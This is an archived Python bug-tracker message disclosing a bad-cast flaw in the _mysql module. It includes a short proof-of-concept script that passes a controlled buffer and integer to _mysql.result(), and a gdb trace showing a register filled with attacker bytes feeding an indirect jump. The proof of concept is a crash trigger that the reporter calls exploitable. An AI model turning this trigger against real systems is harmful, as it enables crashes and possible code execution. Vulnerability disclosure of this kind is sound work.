[issue29150] Bad cast@ _mysql_ResultObject_Initialize() result in code execution

zeroinside report at bugs.python.org
Wed Jan 4 06:26:34 EST 2017 

New submission from zeroinside:

Hello.
I found a vulnerability in _mysql module.
PoC below:
#!/usr/bin/python2.7
import _mysql
RDX=0x66666666
payload="A"*2048
_mysql.result(payload,RDX)


It's exploitable bug, I'm working on exploit.
(gdb) run mysql.py 
Starting program: /usr/bin/python2.7 mysql.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff38e7f3c in mysql_use_result () from /usr/lib/libmysqlclient.so.18
(gdb) info reg
rax            0x4141414141414141       4702111234474983745
rbx            0x7ffff7e91b90   140737352637328
rcx            0x0      0
rdx            0x66666666       1717986918
rsi            0x7ffff7eb1ec0   140737352769216
rdi            0x5555557f9890   93824995006608
rbp            0x7fffffffe120   0x7fffffffe120
rsp            0x7fffffffe0a8   0x7fffffffe0a8
r8             0x7fffffffdd00   140737488346368
r9             0x7fffffffdd80   140737488346496
r10            0x5555557824f0   93824994518256
r11            0x2      2
r12            0x5555557560a0   93824994336928
r13            0x0      0
r14            0x7ffff7e939c7   140737352645063
r15            0x7ffff7e91b90   140737352637328
rip            0x7ffff38e7f3c   0x7ffff38e7f3c <mysql_use_result+12>
eflags         0x10206  [ PF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) disas $rip
Dump of assembler code for function mysql_use_result:
   0x00007ffff38e7f30 <+0>:     push   %rbp
   0x00007ffff38e7f31 <+1>:     mov    0x4d0(%rdi),%rax
   0x00007ffff38e7f38 <+8>:     mov    %rsp,%rbp
   0x00007ffff38e7f3b <+11>:    pop    %rbp
=> 0x00007ffff38e7f3c <+12>:    mov    0x18(%rax),%rax
   0x00007ffff38e7f40 <+16>:    jmpq   *%rax
End of assembler dump.
(gdb)

----------
components: Library (Lib)
messages: 284629
nosy: zeroinside
priority: normal
severity: normal
status: open
title: Bad cast@ _mysql_ResultObject_Initialize() result in code execution
type: security
versions: Python 2.7

_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue29150>
_______________________________________

More information about the Python-bugs-list mailing list